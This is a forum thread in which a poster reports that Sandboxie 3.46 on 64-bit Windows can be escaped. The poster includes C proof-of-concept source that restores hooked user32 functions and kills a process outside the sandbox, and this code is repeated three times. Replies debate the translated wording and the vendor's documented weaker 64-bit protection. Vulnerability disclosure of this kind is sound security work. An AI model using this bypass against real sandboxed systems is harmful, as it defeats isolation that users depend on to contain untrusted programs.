breakout sandboxie 3.46 x64
3 posters
Page 1 of 1
breakout sandboxie 3.46 x64
by google translate
==================================
Sandboxie 3.46 to see the official version released in the update statement, sandboxie shamelessly and boastfully claimed that he had the perfect support for the x64-bit operating system, 64-bit operating system and the user can get the same 32-bit operating system user security :
"Improved support for 32-bit and 64-bit Windows Vista and Windows 7. Support for 64-bit Windows should now be on par with 32-bit Windows"
In the X64 on making a perfect defense to support the complete core commercial software, is a very difficult issue, I can not help but praise the beginning of the sandboxie of
After praise and began to test in the end is not able to really support the defense of the X64 After the test I discovered that is not the case, sandboxie simply can not provide and in 64 of 32 equal protection, the 64-bit on, SANDBOXIE a lot of defense is missing, or can easily be bypassed, but the same 32 defense will not be affected.
Give a simple example, in the 32-bit operating systems, the end of the process for EndTask form, sandboxie made a protected achieved by hook NtRequestWaitReplyPort csrss of RPC communication with the interceptor to intercept the terminating of the process, but in 64-bit operating system , the only approved ring3 api hook EndTask way to implement the UI such as isolation
It is clear that the procedure was isolated sandbox can easily break this useless protection, through the sandbox, the process of destruction outside the sandbox or the sandbox outside the process to steal the information.
Here attached a test program, the need win7 x64 Simplified Chinese operating system running (because of hard-coding the window name, etc.), this procedure is used in the X64 on to start run sandbox and they can penetrate the sandbox to terminate outside the sandbox the calculator program.
Test method, start the calculator first, and then run sandbox run endtask.exe, calculator instantly terminated
POC test program source code:
#include "stdafx.h"
#define WINNT 1
#include "windows.h"
#include "winuser.h"
int _tmain(int argc, _TCHAR* argv[])
{
PVOID pAddr = GetProcAddress(GetModuleHandleA("user32.dll") , "EndTask");
PVOID pAddr2 = GetProcAddress(GetModuleHandleA("user32.dll"), "FindWindowExA");
ULONG oldp ;
VirtualProtect(pAddr , 0x5 , PAGE_READWRITE , &oldp);
*(BYTE*)pAddr = 0x48 ;
*(DWORD*)((ULONGLONG)pAddr + 0x1) = 0x08245c89 ;
VirtualProtect(pAddr , 0x5 , oldp, &oldp);
VirtualProtect(pAddr2 , 0x5 , PAGE_READWRITE , &oldp);
*(BYTE*)pAddr2 = 0x48 ;
*(DWORD*)((ULONGLONG)pAddr2 + 0x1) = 0x8338ec83 ;
VirtualProtect(pAddr2 , 0x5 , oldp, &oldp);
HWND h = FindWindowExA(0 , 0 , 0 ,"Calculator");
if (h == 0 )
{printf("cannot find calc\n");}
EndTask(h , TRUE , TRUE );
return 0;
}
==================================
Sandboxie 3.46 to see the official version released in the update statement, sandboxie shamelessly and boastfully claimed that he had the perfect support for the x64-bit operating system, 64-bit operating system and the user can get the same 32-bit operating system user security :
"Improved support for 32-bit and 64-bit Windows Vista and Windows 7. Support for 64-bit Windows should now be on par with 32-bit Windows"
In the X64 on making a perfect defense to support the complete core commercial software, is a very difficult issue, I can not help but praise the beginning of the sandboxie of
After praise and began to test in the end is not able to really support the defense of the X64 After the test I discovered that is not the case, sandboxie simply can not provide and in 64 of 32 equal protection, the 64-bit on, SANDBOXIE a lot of defense is missing, or can easily be bypassed, but the same 32 defense will not be affected.
Give a simple example, in the 32-bit operating systems, the end of the process for EndTask form, sandboxie made a protected achieved by hook NtRequestWaitReplyPort csrss of RPC communication with the interceptor to intercept the terminating of the process, but in 64-bit operating system , the only approved ring3 api hook EndTask way to implement the UI such as isolation
It is clear that the procedure was isolated sandbox can easily break this useless protection, through the sandbox, the process of destruction outside the sandbox or the sandbox outside the process to steal the information.
Here attached a test program, the need win7 x64 Simplified Chinese operating system running (because of hard-coding the window name, etc.), this procedure is used in the X64 on to start run sandbox and they can penetrate the sandbox to terminate outside the sandbox the calculator program.
Test method, start the calculator first, and then run sandbox run endtask.exe, calculator instantly terminated
POC test program source code:
#include "stdafx.h"
#define WINNT 1
#include "windows.h"
#include "winuser.h"
int _tmain(int argc, _TCHAR* argv[])
{
PVOID pAddr = GetProcAddress(GetModuleHandleA("user32.dll") , "EndTask");
PVOID pAddr2 = GetProcAddress(GetModuleHandleA("user32.dll"), "FindWindowExA");
ULONG oldp ;
VirtualProtect(pAddr , 0x5 , PAGE_READWRITE , &oldp);
*(BYTE*)pAddr = 0x48 ;
*(DWORD*)((ULONGLONG)pAddr + 0x1) = 0x08245c89 ;
VirtualProtect(pAddr , 0x5 , oldp, &oldp);
VirtualProtect(pAddr2 , 0x5 , PAGE_READWRITE , &oldp);
*(BYTE*)pAddr2 = 0x48 ;
*(DWORD*)((ULONGLONG)pAddr2 + 0x1) = 0x8338ec83 ;
VirtualProtect(pAddr2 , 0x5 , oldp, &oldp);
HWND h = FindWindowExA(0 , 0 , 0 ,"Calculator");
if (h == 0 )
{printf("cannot find calc\n");}
EndTask(h , TRUE , TRUE );
return 0;
}
mj0011- New Member
- Posts : 2
Join date : 2010-07-13
Re: breakout sandboxie 3.46 x64
Wow, thanks for that mj0011 - I'll forward that to tzuk and see what he thinks. However, let me correct/clarify a few non-technical things about Sandboxie 64-bit.
Essentially (keeping in mind that I'm replying to a piece of automatically translated text), I think you have mis-interpreted this statement:
http://www.sandboxie.com/phpbb/viewtopic.php?p=54417#54417
As you can see, tzuk's reply is fairly clear:
In fact, tzuk has already admitted many times over that 64-bit Sandboxie is not as strong as 32-bit Sandboxie. It's even officially documented here:
http://www.sandboxie.com/index.php?NotesAbout64BitEdition
Essentially (keeping in mind that I'm replying to a piece of automatically translated text), I think you have mis-interpreted this statement:
I was wondering about what this meant exactly too, and I got it clarified here:"Support for 64-bit Windows should now be on par with 32-bit Windows"
http://www.sandboxie.com/phpbb/viewtopic.php?p=54417#54417
As you can see, tzuk's reply is fairly clear:
In no way does he claim that 64-bit Sandboxie is as strong against malware as 32-bit Sandboxie. Basically tzuk is referring to technical support when he states that 64-bit Sandboxie is on par with 32-bit - he is not referring to the strength of the program to perform containment/isolation.I was referring to the many, many problems reported about getting stuff to install or run properly under 64-bit Sandboxie, where the same stuff would work perfectly under 32-bit Sandboxie.
In fact, tzuk has already admitted many times over that 64-bit Sandboxie is not as strong as 32-bit Sandboxie. It's even officially documented here:
http://www.sandboxie.com/index.php?NotesAbout64BitEdition
The 64-bit edition of Sandboxie provides a reduced level of protection compared to the 32-bit edition of Sandboxie.
Re: breakout sandboxie 3.46 x64
Admin note
Please, in future address your comments and questions to the developer before throwing insults around here. This forum is not a "free for all" for people to insult or disparage active developers.
Please, in future address your comments and questions to the developer before throwing insults around here. This forum is not a "free for all" for people to insult or disparage active developers.
mj0011 wrote:by google translate
==================================
Sandboxie 3.46 to see the official version released in the update statement, sandboxie shamelessly and boastfully claimed that he had the perfect support for the x64-bit operating system, 64-bit operating system and the user can get the same 32-bit operating system user security :
"Improved support for 32-bit and 64-bit Windows Vista and Windows 7. Support for 64-bit Windows should now be on par with 32-bit Windows"
In the X64 on making a perfect defense to support the complete core commercial software, is a very difficult issue, I can not help but praise the beginning of the sandboxie of
After praise and began to test in the end is not able to really support the defense of the X64 After the test I discovered that is not the case, sandboxie simply can not provide and in 64 of 32 equal protection, the 64-bit on, SANDBOXIE a lot of defense is missing, or can easily be bypassed, but the same 32 defense will not be affected.
Give a simple example, in the 32-bit operating systems, the end of the process for EndTask form, sandboxie made a protected achieved by hook NtRequestWaitReplyPort csrss of RPC communication with the interceptor to intercept the terminating of the process, but in 64-bit operating system , the only approved ring3 api hook EndTask way to implement the UI such as isolation
It is clear that the procedure was isolated sandbox can easily break this useless protection, through the sandbox, the process of destruction outside the sandbox or the sandbox outside the process to steal the information.
Here attached a test program, the need win7 x64 Simplified Chinese operating system running (because of hard-coding the window name, etc.), this procedure is used in the X64 on to start run sandbox and they can penetrate the sandbox to terminate outside the sandbox the calculator program.
Test method, start the calculator first, and then run sandbox run endtask.exe, calculator instantly terminated
POC test program source code:
#include "stdafx.h"
#define WINNT 1
#include "windows.h"
#include "winuser.h"
int _tmain(int argc, _TCHAR* argv[])
{
PVOID pAddr = GetProcAddress(GetModuleHandleA("user32.dll") , "EndTask");
PVOID pAddr2 = GetProcAddress(GetModuleHandleA("user32.dll"), "FindWindowExA");
ULONG oldp ;
VirtualProtect(pAddr , 0x5 , PAGE_READWRITE , &oldp);
*(BYTE*)pAddr = 0x48 ;
*(DWORD*)((ULONGLONG)pAddr + 0x1) = 0x08245c89 ;
VirtualProtect(pAddr , 0x5 , oldp, &oldp);
VirtualProtect(pAddr2 , 0x5 , PAGE_READWRITE , &oldp);
*(BYTE*)pAddr2 = 0x48 ;
*(DWORD*)((ULONGLONG)pAddr2 + 0x1) = 0x8338ec83 ;
VirtualProtect(pAddr2 , 0x5 , oldp, &oldp);
HWND h = FindWindowExA(0 , 0 , 0 ,"Calculator");
if (h == 0 )
{printf("cannot find calc\n");}
EndTask(h , TRUE , TRUE );
return 0;
}
Guest- Guest
Re: breakout sandboxie 3.46 x64
Good point patrick. I'm giving him the benefit of the doubt (because we're reading automatically translated text, and may miss the context etc.). However, it does read like a fairly blatant insult.
Re: breakout sandboxie 3.46 x64
Yes sometimes those translations are strange. but it seemed unnecessarily aggressive.
ssj100 wrote:Good point patrick. I'm giving him the benefit of the doubt (because we're reading automatically translated text, and may miss the context etc.). However, it does read like a fairly blatant insult.
Guest- Guest
Re: breakout sandboxie 3.46 x64
Didn't MS provide API's to security companies to access the kernel back in 2006? What ever happened to that?
http://www.fiercecio.com/story/microsoft-debuts-draft-patchguard-workarounds/2006-12-20
http://www.fiercecio.com/story/microsoft-debuts-draft-patchguard-workarounds/2006-12-20
blah1234- New Member
- Posts : 1
Join date : 2011-02-09
Similar topics
» Sandboxie 3.46 released
» Something worries me about Sandboxie...
» Sandboxie about to be bypassed?
» Sandboxie configurations
» Some of my (other) thoughts on Sandboxie...
» Something worries me about Sandboxie...
» Sandboxie about to be bypassed?
» Sandboxie configurations
» Some of my (other) thoughts on Sandboxie...
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum
|
|